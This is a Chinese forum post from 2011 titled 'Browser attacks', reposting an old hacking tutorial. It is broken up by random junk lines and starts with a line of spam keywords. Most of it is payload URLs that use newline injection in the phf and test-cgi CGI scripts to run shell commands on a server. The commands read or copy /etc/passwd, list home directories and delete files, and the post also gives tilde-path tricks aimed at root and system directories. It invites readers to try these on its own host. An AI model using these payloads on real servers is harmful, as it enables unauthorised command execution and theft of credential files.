中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视
汶上信息港
標題:
瀏覽器攻擊
[打印本頁]
作者:
雜七雜八
時間:
2011-1-12 21:00
標題:
瀏覽器攻擊
在本章我將講述一些利用瀏覽器來進行攻擊的方法
/ @2 v! S) q% ~* }, g: c, c- H# w+ L
1。大家都知道了phf攻擊了,phf是cgi script,很多站點都有這個大漏洞啦,使用
! i2 ~- N" f: p- y2 o
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那個站點的passwd.但還有些更好的執(zhí)行方法呦如:
* z: k& o7 L' Z" ^6 z
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
. _3 T$ }& j5 j8 z) D
6 ] B l. X4 a- N% b `
me=&Qoffice_phone=
# ?5 H& a6 w" O7 E( w$ O
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
- c5 n) r1 i& h0 U; Y; }/ K& O! I( \
haqr&Qemail=&Qnickname=&Qoffice_phone=
: u+ v( o" `1 a# E% H1 s- {$ p
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
8 Z' V" t l% Q+ _1 R; o6 U, y: y: w
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
% ?0 G8 E4 Y+ w0 C. P; q. k
http://thegnome.com/~someuser/passwd
7 Y- X p& y2 h
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
* e/ L% m- n3 J4 _, W3 @
. O; P$ G4 @" [1 N# C* y# k
=haqr&Qemail=&Qnickname=&Qoffice_phone=
2 w6 l- E& t# x3 Q3 T% F. g7 k
上面執(zhí)行的命令是
0 O7 G& s2 e3 [
id
) X* N5 Q; [: z; m4 a: N f
ls -la ~someuser
' d$ L8 R* q4 b+ R4 [8 R1 f
cp /etc/passwd ~someuser/passwd
# F( O' O$ d0 H0 n3 ^4 \; R
rm ~someuser/passwd
G$ q6 q/ S# Z2 ~6 S+ p
) J% H* D$ a3 [6 O0 I5 y
2。有關(guān)test攻擊
9 w* t4 H. a& r1 ?& `4 s9 W6 Q
http://thegnome.com/cgi-bin/test-cgi?\whatever
# I$ A" B- C+ U( r8 I# t6 u4 c. }6 ^) |( J
服務(wù)器會應答,本服務(wù)器的一些情況如:
: U1 k. Q/ D$ a: a, k. x2 N
CGI/1.0 test script report:
4 M2 Y# N0 `& _/ G2 s7 D$ ~
) m1 V) y# G! t. k+ I1 k( m
argc is 0. argv is .
& C3 ?- X( E% {# D% w% p
+ r# ~, I/ f! @ @, f
SERVER_SOFTWARE = NCSA/1.4B
2 h! i2 Q9 g0 N( Q$ y
SERVER_NAME = thegnome.com
5 U; R: F4 c, J! \( ]
GATEWAY_INTERFACE = CGI/1.1
' e/ G3 A" p' G+ @$ K( R
SERVER_PROTOCOL = HTTP/1.0
6 g5 ?8 W. z7 w% {
SERVER_PORT = 80
- r. g6 V* x5 H- y* W9 ?$ h
REQUEST_METHOD = GET
( ?2 J( X4 S; L0 C" d
HTTP_ACCEPT = text/plain, application/x-html, application/html,
. C' G7 Z6 ]2 d& X9 s* i3 }1 o
text/html, text/x-html
0 ^; Z$ s3 E* [+ D! ^+ _7 r
PATH_INFO =
2 u: D. r7 c& H' x
PATH_TRANSLATED =
3 R7 B0 {3 D5 B' N4 c& h, t5 r
SCRIPT_NAME = /cgi-bin/test-cgi
. K) k6 J: l- }, I# u$ A
QUERY_STRING = whatever
& v0 W: q6 J% W$ Q
REMOTE_HOST = fifth.column.gov
* h- x0 Z( ~. W7 m
REMOTE_ADDR = 200.200.200.200
/ V5 V4 @5 \0 U' P5 L. L
REMOTE_USER =
' e; Q* k3 O1 ?7 r, H
AUTH_TYPE =
|& R! R* Z- _- R' F; b
CONTENT_TYPE =
( c! T6 g! d- r& s% v% g
CONTENT_LENGTH =
7 r/ S3 f6 s+ R! k5 s
% Q# m' C: g \" m6 x
好吧,讓我們來點趕興趣的
" {3 T7 D3 Q% o- ~ B2 `9 @% a
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
+ L, W! P7 p0 Q/ T3 z! n
$ v3 l* |6 g" d# F" Y6 m$ ~
3。~的應用
4 V+ ` c6 {6 s0 }! ?
~主要是用在很多的個人主頁上的快捷目錄的方法,如果我們使用這樣的~
% N- a; [2 `5 u6 K; P N" t! j
http://thegnome.com/~root
! a/ @& U) q d! E) K
http://thegnome.com/~root/etc/passwd
- b% k! G, C$ F& g; W& k, o
不是在任何平臺上都通過呦,在BSD Apache上曾經(jīng)成功過,當然還可以試試~bin ,~etc,~uucp.....
$ ^3 W3 m0 ~, ~4 @3 _" ~; u& k
看到這個站點了嗎,本站所在的這個站點就是用這種形式的,如果我們打入 本站所在的web地址/~bin
- @& G0 u$ G8 Z. l5 E
出現(xiàn)了什么,你看到了嗎?然后...............注意請不要破壞
5 i/ g2 M5 y3 \ k7 h0 B+ w! ^
\8 u1 ~4 T3 c0 A U$ [4 z
歡迎光臨 汶上信息港 (http://huihexinxi.com.cn/)
Powered by Discuz! X3.5